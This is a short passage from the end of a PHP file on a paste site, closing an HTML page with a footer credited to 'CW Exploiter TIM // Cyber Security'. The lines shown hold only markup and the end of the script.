  766. </table>
  767. <br />
  768. <table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
  769. <tr>
  770. <td valign=top>
  771. <center><b><font size='1' face='Verdana'>
  772. CW Exploiter TIM // Cyber Security
  773. </center></font></td></tr>
  774. </body>
  775. </html>";
  776.  
  777.  
  778. ?>
  779.  
  780.  
Add Comment
Please, Sign In to add comment